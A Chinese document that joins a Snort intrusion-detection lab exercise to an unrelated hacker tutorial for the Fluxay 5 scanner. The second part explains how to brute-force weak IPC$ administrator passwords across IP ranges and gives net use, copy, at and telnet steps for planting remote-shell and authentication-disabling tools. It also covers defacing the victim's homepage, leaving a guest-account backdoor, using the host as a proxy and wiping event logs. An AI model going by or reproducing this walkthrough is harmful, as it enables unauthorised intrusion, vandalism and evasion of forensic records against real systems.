实验一Windows平台下Snort的应用【实验背景】Snort是一种跨平台、轻量级、基于特征匹配的网络入侵检测系统。系统采用灵活的体系结构,大量使用插件机制,具有很好的扩展性和可移植性。本试验要实现采用流光软件对目标主机进行扫描;用Winpcap软件捕获数据包;用Snort进行分析,并介绍Windows平台下的Snort应用软件IDSCenter。主要下载站点有、、。【实验目的】掌握用Snort作为基于主机的入侵检测系统(HIDS)的使用。【实验条件】(1)Winpcap2.3,Snort2.0,IDScenter1.1RC2,Fluxay5;(2)HIDS主机A:Windows2000/2003,IP地址192.168.6.80/24;(3)攻击主机B:Windows2000/2003,IP地址192.168.6.81/24。注:IP地址可以根据实验室主机配置不同进行设置。【实验任务】(1)学习使用Snort数据包检测和记录功能;(2)通过IDScenter配置功能加强对Snort原理的理解。【实验步骤】1.安装数据包捕获软件由于Snort本身没有数据包捕获功能,因此需要用其他软件来捕获数据包。Winpcap是libpcap抓包库的Windows版本,它同libpcap具有相同的功能,可以捕获原始形式的包。在HIDS主机上安装Winpcap过程如下:(1)双击winpcap-2-3.exe启动安装;(2)屏幕出现欢迎对话框,单击“Next”按钮;(3)下一个对话框提示安装过程完成,单击“OK”按钮完成软件安装。(4)Winpcap安装成功,重新启动计算机。2.安装Snort软件在HIDS主机上安装Snort软件过程如下:(1)双击Snort-2.0.exe,启动安装程序;(2)启动安装以后,会看到关于Snort的一篇文献,阅读并单击“IAgree”按钮;(3)出现的是安装选项对话框,单击“Next”按钮;(4)将选择安装部件,选择完毕后单击“Next”按钮;(5)现在提示安装位置,使用默认的,并单击“Install”按钮;(6)安装完成,单击“Close”按钮。3.在攻击主机B上安装流光5(Fluxay5)扫描软件,默认安装即可4.Snort数据包嗅探及包记录应用(1)用Ping命令测试HIDS主机A与攻击主机B网络连通。(2)在A机器上单击“开始”→“运行”,在【运行】窗口中输入“cmd”打开DOS界面,如果在Snort安装时选择的默认安装路径为C:\,则在DOS界面中打入命令“cdC:\snort\bin”进入snort安装目录,然后打入如下命令以数据包记录的形式启动Snort:snort-dev-l/snort/log-h192.168.6.80/24。此命令为记录子网为192.168.6.80/24的数据,并把捕获的数据文件保存到Snort/log目录下,此时可以在屏幕上不断显示嗅探到的数据包,显示满一页后就不断滚屏。(3)在B机器上启用扫描软件流光5,右击“IPC$主机”→“编辑”→“添加”,在【添加主机】窗口中加入要扫描的主机“192.168.6.80”即安装了Snort的HIDS主机,如图1所示。图1流光探测主机(4)在流光5软件中右击“192.168.6.80”→“探测”→“扫描主机端口”,确定端口扫描范围后,对HIDS主机进行端口扫描,扫描到的结果如图2所示。图2扫描结果(5)在HIDS主机的DOS界面下可以看到从B机器扫描发过来的探测的数据包信息,如图3所示。使用Ctrl-C键可以退出程序,看到数据包统计信息。图3DOS界面上的数据包显示(6)在Snort/log目录下打开文件名为“192.168.6.81”文件夹,可以看到很多刚才B机器上对A机器进行扫描的数据包记录,如图4所示。图47.15log目录下记录的数据包信息对记录的数据包信息作进一步的分析,如图5所示。图5数据包记录检测到此数据包的信息如下:源MAC地址:0:11:D8:7B:7:3B;目的MAC地址:0:11:D8:7B:7:89;类型:0*800,长度:0*3E;源IP地址:192.168.6.81,源端口:1053;目的IP地址:192.168.6.80,目的端口:80;协议类型是:TCP;TTL(生存时间):128;TOS(服务类型):0*0;ID:205;IP包头长度:20;数据包总长度:48DF。后面的一段信息显示此数据包企图探测连接目的主机80端口。从上面的数据包记录的信息来看,就可以知道网络上有人可能在扫描HIDS主机端口的开放情况,必须采取措施将端口关闭或更改。5.Snort用于入侵检测功能Snort除了数据包嗅探和数据包记录的功能外,还有很重要的一个功能就是入侵检测(IDS)功能,能够应用Snort的规则集来检测特定网络的可疑行为,本实验不作详述。6.IDScenter应用在HIDS主机上安装IDScenter,只需要双击安装程序,一步步按照默认安装即可。当启动IDScenter应用程序后,它将出现在系统任务栏上并显示为一个大黑点,单击这个黑点就可以打开配置窗口了。对于IDScenter进一步的学习和使用,可以通过互联网搜集相关的资料,这里不再详细说明。【思考与练习】1.简述Snort系统的特点2.设计并实现一个Snort入侵检测的完整过程。流光5.0流光5.0流光5.0的破解可分为5大部分:一、POP3/FTP/…探测二、IPC探测三、SQL探测四、高级扫描五、其它…因为开发时间的原因,上面的探测模式略有不同,所以分成了四个部分,本教程说的是第一个部分的探测。后面的探测模式应该属于流光5.0的高级应用了:)流光5.0的IPC探测:一、目的和任务:1、用流光5.0的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。2、学习IPC探测的相关知识。二、探测流程:1、你得有流光5.0,我这里试验用的是流光5.02001.FORWin2000中文版。FORWin98的不可以。因为IPC连接功能是NT/2000提供的功能。而且流光5.0FOR2K要求你的操作系统得是NT/2000,否则流光5.0启动会失败!什么是IPC:IPC是指InterProcessCommunications,准确的说是ipc$,是默认的在系统启动时的admin共享。IPC$是WindowsNT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。可不可以通过IPC$暴力破解密码?当然可以!不过,是不是太笨了点…2、首次启动流光5.0,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。在主界面选择探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度:)填入IP,选择扫描NT/98主机4、探测中……(注意如果你要探测的是流光5.0保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现IP保留的字样)有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么?:)有的是!自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net命令吧。黑了他!开个dosprompt执行如下命令,本次用的例子如下图。1、netuse\\对方ip\ipc$密码/user:用户名||建立远程连接2、copyicmd.exe\\对方ip\admin$||admin$是对方的winnt目录:)这里文件多。3、nettime\\对方IP||看看对方的本地时间4、at\\对方ip启动程序的时间启动程序名启动程序的参数||用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代3/4两步。5、telnet对方ip端口||6、输入pass(如果不是用icmd.exe,或者没有设置口令就不用了)||7、在开个窗口,继续copy我们用的东西。copysock.execopyntlm.execopycl.execlear.exe如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir/sdefault.htm或者dir/sindex.htm来确定对方首页的为止,一般是在X:\interpub\假如首页文件是default.htm并且在c:\interpub\,这样:copydefault.htm\\ip\c$\interpub\、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:执行我们copy过去的ntlm.exe,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西:)9、还能做成其他的么?当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿:)10、日志清除,断开连接:执行我们copy过去的cl.execlear.exe都可以清除日志,比如clearall:清除所有的日志。然后在断开连接:netuse\\ip\ipc$/delete流光5.0简介流光5.04.7)一个绝好的ftp、pop3解密工具,界面豪华,功能强大!功能简介如下:1、用于检测POP3/FTP主机中用户密码安全漏洞。2、163/169双通。3、多线程检测,消除系统中密码漏洞。4、高效的用户流模式。5、高效服务器流模式,可同时对多台POP3/FTP主机进行检测。6、最多500个线程探测。7、线程超时设置,阻塞线程具有自杀功能,不会影响其他线程。8、支持10个字典同时检测。9、检测设置可作为项目保存。10、取消了国内IP限制而且免费。流光5.04.7新增功能:1、加入了本地模式,在本机运行是不必安装Sensor。2、Sensor扫描临时结果文件(*.PTR)的尺寸大约减少了10倍。3、后台扫描模式时,扫描的结果(*.PTR)可以直接通过附件发送到信箱。4、Sensor的扫描速度加快。5、减少了Sensor异常退出的BUG。6、流光5.0的界面和Sensor之间的通讯采用Triple-DES,密钥的长度最多可到192bits,保证整个传输过程不可监听。扫描的结果也只有在密钥正确的情况下才可阅读。7、修正的控制服务,新的控制服务在升级Sensor时不再会失败。8、Sensor的服务名称可以任意指定,控制服务和Sensor的进程名称也可以任意指定。9、支持XP(本地模式),很快会有98/ME的版本。